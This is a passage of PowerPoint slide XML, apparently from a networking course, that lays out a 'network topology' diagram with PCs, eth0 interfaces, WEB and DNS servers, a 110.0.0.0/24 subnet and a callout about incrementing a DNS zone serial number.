        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7849996" y="5626473"/>
            <a:ext cx="3405443" cy="760022"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75067"/>
              <a:gd name="adj2" fmla="val -112075"/>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t>looks up the serial number of the zone file and increments it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4096858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731E-5580-B7FE-1701-BD2F8B3928DD}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15137E55-A755-070B-F9FB-82B971C8CEF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2325716" y="6326233"/>
            <a:ext cx="904078" cy="79994"/>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22" name="Connettore diritto 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8D27A9-F1DB-00C5-2ECB-D465104C2A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3229794" y="6156631"/>
            <a:ext cx="181044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A93E2A4B-2FAF-AC8B-6053-94ED9C968D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1917704" y="5790799"/>
            <a:ext cx="131027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327" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC61594-ADC1-6692-2644-09A50ACA7AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1348638" y="3095873"/>
            <a:ext cx="7415" cy="505625"/>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9305" name="Connettore diritto 9304">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5F1B31F-8B70-24BA-AB7B-BDEAAFE93C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9287" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764107" y="1822409"/>
            <a:ext cx="20032" cy="6474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298" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E7FD6D-4DC6-EF8A-B6D0-8DB4537C5701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="3033869"/>
            <a:ext cx="3526369" cy="265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9297" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{144EDECC-4B50-96B4-7C79-AEDF01F8486A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3799212" y="3881170"/>
            <a:ext cx="1286124" cy="6713"/>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55" name="Connettore diritto 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1577400-5973-C9D5-C90C-84FBAB7E58C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5217619" y="5309001"/>
            <a:ext cx="7414" cy="6154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Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5EDF864-EE79-D790-7FDB-8D8652E8A606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7403649" y="1891613"/>
            <a:ext cx="20032" cy="460633"/>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39" name="Connettore diritto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FFB23E-3CE0-FD94-E77C-C9BFBAE57D8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5691343" y="1822409"/>
            <a:ext cx="5866" cy="6358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F342D0C8-E424-AD96-34FB-A1D967B74D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763186" y="1841489"/>
            <a:ext cx="0" cy="6023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6080A8BB-C4B0-5E7C-AF36-F66B7BD267C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821141" y="1834146"/>
            <a:ext cx="0" cy="5992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220" name="Rectangle 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B7AB9C-443C-190B-DD17-17EADD1D849B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>network topology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC2181D-E77A-6F61-129F-39087F123178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8905197-5254-49E9-E2B1-6242702FE0D4}"/>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2" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF548390-1AC9-2A2D-0A4B-534999FD223D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3532746" y="1220690"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A36392-D62D-FC3B-DFDF-D8D2E705D46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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D429EB6E-E631-7976-7F9E-B54061AC0952}"/>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pc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D80D959-0B0A-DBC9-B176-5E80A03D1B9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4474791" y="1228033"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3247083B-67A8-AAE7-09C6-7AB1793BF03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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50CC8B81-2464-2AA3-C6FB-958F5BB68E80}"/>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pc2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F5AE82-0D07-D12C-1233-42AC1C15F289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1518965" y="5559356"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D1C2A8-B36E-55F4-0875-65B78A11FF8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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82897B7E-F5B7-6C4E-2A55-DE39BE0EEDBC}"/>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pc3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693D7DB7-7AAD-A380-BB32-994D0A092775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3440447" y="2446573"/>
            <a:ext cx="3852857" cy="2332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12" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69428313-DB53-631F-3766-E7F6F8221F7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7293304" y="2363536"/>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A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F88F38-E909-BB29-30E1-A344B51D5745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657018" y="1972871"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33F32CD-7090-49DE-3D84-56BA01713BED}"/>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eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9575810-390E-C529-A125-7EEF5166E348}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4A5967-0971-63AC-7508-468D5F421D3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4597668" y="1958829"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0084805D-6035-46BD-2115-06190225E399}"/>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18" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36937973-FCBC-7415-72C1-66383404F237}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Gruppo 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE2FFCA-3208-A78E-3C45-029706448423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5243610" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFAAC1E6-3702-3D96-050E-EB33987FB555}"/>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uniromatre</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57E06DE-34A5-11C0-BF58-4DF4AEE274FF}"/>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34" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268AE795-B7FE-8CEE-CAA4-FD3DAB829ED1}"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FDABC20-715F-2687-E2E3-5DC745034275}"/>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WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB510834-2761-7C64-4FE9-538E3783D539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5525825" y="1967277"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4CF0640-64A9-0A5F-372C-2966C45A4F20}"/>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38" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D1FD40-F458-F6E4-CA20-55D822CE3041}"/>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50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Gruppo 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3761D9-172C-C26E-22FA-86373A1A23A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2150227" y="4015813"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A6A9E32-42BB-14B4-2F4E-7B03FF459655}"/>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42" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23DD2191-4E2A-6512-187E-CF95DFAA0B72}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7F5B40-960E-6B35-B430-2F3DC91A2E72}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFB19AA2-3D16-59D7-BBC1-D7CB01F3D6A7}"/>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dnsit</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1242D84A-95FE-6D8C-7CAC-E105E309E89F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6598589" y="1968796"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF843C2-C0EB-728F-42EB-46B5E288CAC2}"/>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47" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{842B0EB1-4FF5-41A2-6293-DE77A24CC442}"/>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
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71DE872-0D38-9676-1D42-DFD72C59958D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7373670" y="1644027"/>
            <a:ext cx="114646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110.0.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{802AB8B5-D754-FEC6-8B92-4908D7925D8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4346573" y="5294208"/>
            <a:ext cx="1756921" cy="2332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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B09D66C-8525-217B-5D02-5A0E677A15AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5069517" y="5457813"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBA00D3-C07E-BFCE-CD9E-0F1CF2A819C6}"/>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54" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C766587A-38D0-19C5-FB62-2C182D5B266D}"/>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
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736679B3-9715-2CC0-0F46-4477D1A83CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
